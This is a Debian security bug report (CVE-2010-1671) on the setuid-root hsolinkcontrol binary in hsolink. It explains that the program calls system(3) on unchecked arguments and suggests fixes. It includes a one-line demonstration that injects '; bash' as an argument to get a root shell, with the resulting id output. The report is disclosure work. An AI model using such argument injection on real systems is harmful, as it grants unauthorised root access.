[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Bug#590670: insecure setuid usage, local root exploit

Package: hsolink
Version: 1.0.118-3
Severity: critical
Tags: security


Following was reported by Christian Jaeger.


hsolink-1.0.118 contains a binary hsolinkcontrol that is setuid root.
The binary

- neither sets PATH
- nor fixes other environment variables
- nor checks commandline arguments
- but uses system(3)
(- and may be overflowing fixed-size buffers as well, I didn't check anymore)

and thus is a trivial target to get root, for example:

(I've tested from the files in an ar-unpacked .deb instead of
installing the deb, to avoid exposing my system. Note: apparently the
binary has to be at root-owned paths or the Linux kernel will ignore
the setuid bit.)

novo:~/chris# l -a
total 12
-rwsr-xr-x  1 root root  7072 2010-07-09 22:20 hsolinkcontrol
drwxr-x---  2 root chris   80 2010-07-09 22:55 .
drwxr-xr-x 50 root root  4272 2010-07-09 22:55 ..

chris@novo:/root/chris$ ./hsolinkcontrol down '; bash'
Using resolvconf.
root@novo:/root/chris# id
uid=0(root) gid=1000(chris) groups=.....

The setuid recommendation is coming from the upstream author
(http://www.pharscape.org/hsolinkcontrol.html), who apparently is not
aware of the implications of the setuid bit, and good security in
general as evidenced by the problems I've listed above. I have not
informed him of the problem [yet].

I don't know about the right solution; maybe using sudo instead of
setuit and adding commandline argument checking and replacing system
calls with fork/exec* calls. Or, to be safer, instead rather turn it
into a daemon. Iff it needs to be run as ordinary users at all--I'm
used to have to run "pon" as root, for example, the charge to enable a
normal user to run hsolinkcontrol (or the program that uses it) as
root (by setting up sudo, for example) could possibly just be left to
the user (I can't say as I haven't used the program yet).


Debian has assigned CVE-2010-1671 to this issue.


Attachment: signature.asc
Description: This is a digitally signed message part.

Reply to: